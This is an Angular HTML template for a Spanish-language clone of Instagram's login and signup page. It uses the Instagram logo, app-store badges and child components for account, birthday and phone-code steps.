<!-- ROOT -->
<span id="root">
    <section class="section-all">
        <!-- MAIN -->
            <main class="main" role="main">
                <!-- WRAPPER -->
                    <div class="wrapper">
                        <article class="article">
                            <div class="content">
                                <div class="login-box">
                                    <!-- HEADER -->
                                        <div class="header">
                                            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram" />
                                        </div>
                                    <!-- HEADER END-->

                                    <!-- FORM -->
                                        <div class="form-wrap">
                                            <form class="form">
                                                <!-- 
                                                    ACCOUNT
                                                -->
                                                <ng-container *ngIf="this.showAccount">
                                                    <app-account (sigInEvent)="sigIn($event)" (showBirthdayEvent)="showBirthday($event)"></app-account>
                                                </ng-container>

                                                <!-- 
                                                    BIRTTHDAY
                                                -->
                                                <ng-container *ngIf="this.showBirthDay">
                                                    <app-birthday (showCodePhoneEvent)="showViewCodePhone($event)" (backEvent)="backAccount($event)" [user]="user" ></app-birthday>
                                                </ng-container>

                                                <!-- 
                                                    CODEPHONE
                                                -->
                                                <ng-container *ngIf="this.showCodePhone">
                                                    <app-codephone (codePhoneEvent)="showToFeed($event)" (backEvent)="backBirthday($event)" [user]="user" [birthDay]="birthDay" ></app-codephone>
                                                </ng-container>
                                            </form>
                                        </div>
                                    <!-- FORM END -->
                                </div>

                                <!-- SIGNUP END -->
                                    <div class="login-box">
                                        <p class="text">¿Tienes una cuenta?<a (click)="sigIn($event)">Entrar</a></p>
                                    </div>
                                <!-- SIGNUP END -->

                                <!-- APP -->
                                    <div class="app">
                                        <p>Descarga la aplicación.</p>
                                        <!-- APP IMG -->
                                            <div class="app-img">
                                                <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
                                                    <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png" />
                                                </a>
                                                <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
                                                    <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png" />
                                                </a>
                                            </div>
                                        <!-- APP IMG END-->
                                    </div>
                                <!-- APP END -->
                            </div>
                        </article>
                    </div>
                <!-- WRAPPER END -->
            </main>
        <!-- MAIN END -->

        <!-- FOOTER -->
            <footer class="footer" role="contentinfo">
                <ng-container>
                    <app-footerlogin></app-footerlogin>
                </ng-container>
            </footer>
        <!-- FOOTER END -->
    </section>
</span>
<!-- ROOT END -->
